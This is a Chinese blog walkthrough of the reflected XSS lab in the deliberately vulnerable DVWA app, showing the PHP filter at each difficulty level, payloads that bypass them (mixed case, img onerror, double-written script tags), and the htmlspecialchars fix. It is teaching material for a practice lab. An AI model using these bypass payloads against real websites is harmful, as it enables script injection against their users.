Reflected Cross Site Scripting (XSS)

最新推荐文章于 2024-05-18 10:49:49 发布
最新推荐文章于 2024-05-18 10:49:49 发布
阅读量2.5k 收藏 5
点赞数 1
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angry_program/article/details/104244995
版权

前言

反射型XSS, 即 Reflected Cross Site Scripting (XSS),  攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的 页面和内容),一般容易出现在搜索页面。

下面对四种不同等级的反射型XSS漏洞进行分析:

 

 

  • Low

服务端核心代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Feedback for end user
	$html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

可以看到, 服务端只是判断是否存在name参数值,  存在就直接执行写入pre标签。

 

漏洞利用

由于没有作任何防护,  我们可以直接注入:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<script>alert('You are attacked!')</script>

看到注入的语句被当做script执行了:

 

 

  • Medium

服务端核心代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = str_replace( '<script>', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

Medium级别的服务端将script标签过滤了,  但是他没有不区分大写地过滤 (相应的可以用正则式来防御)。

 

漏洞利用

这里有三种方法:

  • 方法一:  大小写绕过

这里需要明白的一点是

  • HTML中对大小写不敏感
  • JS中对大小写敏感

那么我们的注入语句就有:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<Script>alert('You are attacked!')</scRipt>

  • 方法二:  错误事件img标签绕过

常规操作..:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<img src="" onerror="alert('You are attacked!')">

  • 方法三:  双写绕过

由于服务端只用str_place()过滤了一次,  对于多次出现的无法全部匹配完,  所以这里可以用双写绕过:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<s<script>cript>alert('You are attacked!')</script>

 

 

  • High

服务端核心代码:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

可以看到,   服务端用了正则式并且不区分大小写地过滤所有script标签, 看来服务端对script标签的注入是"情有独钟"啊!

 

漏洞利用

虽然过滤了script标签,  但是还是可以进行其他的标签注入,  比如Medium等级的方法二:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<img src="" onerror="alert('You are attacked!')">

 

 

  • Impossible

服务端核心代码:

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$name = htmlspecialchars( $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>
  • htmlspecialchars() 函数

把一些预定义的字符转换为 HTML 实体。

预定义的字符是:

& (和号) 成为 &amp;

" (双引号) 成为 &quot;

' (单引号) 成为 &#039;

< (小于) 成为 &lt;

> (大于) 成为 &gt;

使用htmlspecialchars函数把预定义的字符&、 、<、>转换为HTML实体,防止浏览器将其作为HTML元素。

angry_program
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss跨站脚本【反射型---Reflected Cross Site Scripting (XSS)】
weixin_71169068的博客
03-29 685
跨网站脚本(Cross-site scriptingXSS) 又称为跨站脚本攻击,是一种经常出现在Web应用程序的安全漏洞攻击,也是代码注入的一种。XSS是由于Web应用程序对用户的输入过滤不足而产生的,攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者用户可能采取Cookie窃取、会话劫持、钓鱼欺骗等各种攻击。这类攻击通常包含了HTML以及用户端脚本语言。
DVWA 之 Reflected Cross Site Scripting (XSS)
baynk的博客
10-29 1903
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ XSS,...
dvwa靶场Reflected Cross Site Scripting (XSS)(跨站脚本攻击)全难度教程(附代码分析)
最新发布
m0_73248913的博客
05-18 365
作为一种HTML注入攻击,XSS攻击的核心思想就是在HTML页面中注入恶意代码,代码语言是js。一般有三个角色参与:攻击者、目标服务器、受害者的浏览器。
XSS (Cross-Site-Scripting)笔记
收集盒 Book box
03-28 881
Michael Cross-Site-Scripting也称跨站脚本攻击,缩写通常为XSS. 或者先到这里补充下知识:http://en.wikipedia.org/wiki/Cross-site_scripting 由于工作需要最近在研究一些常用的攻击方式和漏洞,用以预防和修复.如果你还没有听过说这些,可能你需要先阅读下以下的内容以帮助你快速进入状态。 XSS主要可分
跨站脚本攻击—XSS
FEWY的博客
09-16 1598
XSS 介绍 XSS 是跨站脚本攻击(Cross Site Scripting)的简写,但是从首写字母命名的方式来看,应该取名 CSS,但这样就和层叠样式表(Cascading Style Sheets,CSS)重名了,所以取名为 XSSXSS 攻击,一般是指攻击者通过在网页中注入恶意脚本,当用户浏览网页时,恶意脚本执行,控制用户浏览器行为的一种攻击方式。 XSS 危害 窃取用户Cooki...
DVWA —— Reflected Cross Site Scripting (反射型 XSS)
YouTheFreedom的博客
05-25 345
反射型 XSS,也是非持久型,常见的就是在URL中构造,将恶意链接发送给目标用户。当用户访问该链接时候,会向服务器发起一个GET请求来提交带有恶意代码的链接。造成反弹型XSS 主要是GET类型。
Cross-Site Scripting:Reflected 跨站点脚本:获取
Dearzh的博客
11-15 139
Abstract: article_attrs.jsp 中的方法 _jspService() 向第 79 行的 Web 浏览器发送非法数据,从而导致浏览器执行恶意代码。 Explanation: Cross-Site Scripting (XSS) 漏洞在以下情况下发生: 1. 数据通过一个不可信赖的数据源进入 Web 应用程序。对于 Reflected XSS,不可信赖的源通常为 Web 请...
XSS Cross-site scripting
lay_loge的博客
03-26 467
Cross-site scripting简称跨站脚本攻击,通常也称为XSS。 参考 一、XSS的危害 1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号 2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力 3、盗窃企业重要的具有商业价值的资料 4、非法转账 5、强制发送电子邮件 6、网站挂马 7、控制受害者机器向其它网站发起攻击 二、XSS的分类 XSS主要可分为三种,...
XSS & SQL注入
10-30
XSSCross-Site Scripting,跨站脚本)和 SQL 注入是两种常见的 Web 安全漏洞。下面将详细介绍 XSS 和 SQL 注入的概念、原理和应用。 什么是 XSSXSS,或者称为 CSS,代表着跨站脚本。基本上,XSS 意味着你可以...
Testing for reflected XSS using Burp Repeater.pdf
07-06
首先,访问一个可能存在反射型XSS漏洞的实验网站,如`https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encoded`。通过在搜索栏输入任意字符串(通常称为“金丝雀”...
XSS跨站脚本攻击课件
11-24
XSSCross-Site Scripting)跨站脚本攻击是网络攻防领域中的常见威胁,攻击者利用这种技术向网页中注入恶意脚本,进而对用户的信息安全构成严重风险。由于浏览器通常无法区分合法与恶意脚本,因此在未采取适当防护...
XSS cheat sheet
06-30
XSSCross-Site Scripting),即跨站脚本攻击,是一种常见的 Web 应用程序安全漏洞。攻击者可以通过在网站上注入恶意脚本,来获取用户的敏感信息或控制用户的行为。因此,了解 XSS 攻击的原理和防御方法是非常重要...
跨站攻击(XSS+CSRF).docx
01-05
XSSCross Site Scripting)攻击是指攻击者通过在网页中插入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而达到窃取用户信息、操纵用户行为等目的。XSS攻击主要分为三种类型: 1. 反射型XSS:这类攻击通常...
反射型xss攻击代码.rar
05-14
反射型跨站脚本攻击(Reflected Cross-Site Scripting,简称反射型XSS)是一种常见的网络安全威胁,攻击者利用此类漏洞可以窃取用户的敏感信息,例如Cookie、Session ID等。Java作为一种广泛使用的后端开发语言,也...
backtrack之XSS
04-26
XSSCross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本。在Backtrack 5这样的渗透测试环境中,XSS攻击是Web安全测试的重要部分。Backtrack 5提供了XSSF(Cross-Site ...
xss跨站脚本.docx
11-23
3. 点击开始测试,选择 Cross-Site ScriptingXSS)下的存储攻击。 4. 测试是否过滤特殊字符,提交成功显示提示内容。 5. 显示留言框下显示提交内容,执行结果。 6. 通过脚本执行获取用户 Cookie。 六、结论 XSS ...
DVWA靶场通关(XSS
m0_56010012的博客
03-22 9089
XSS漏洞 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,缩写:CSS)混淆,所以架构跨站脚本攻击缩写为XSSXSS就是攻击者在web页面插入恶意的Script代码,当用户浏览该页面时,嵌入其中的js代码会被执行,从而达到恶意攻击的目的。某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚
Cross-Site Scripting-跨站脚本攻击
田田云逸的博客
04-28 522
#' onclick=alert('jwt') '</a>闭合后:<a href="#" onclick="alert(1399)">#' onclick='alert(1399)
XSSCross-site Script,跨站脚本)漏洞笔记
qq_32812063的博客
11-22 1593
xss笔记
dvwa xss reflected
03-16
DVWA是一个漏洞演示平台,其中包含了多种漏洞类型,其中包括XSS反射漏洞。XSS反射漏洞是一种常见的Web漏洞,攻击者可以通过在URL参数或表单输入中注入恶意脚本,从而在用户浏览网页时执行恶意代码,例如窃取用户的Cookie或其他敏感信息。在DVWA中,可以使用XSS反射漏洞模块来模拟此类攻击,并学习如何防范此类漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值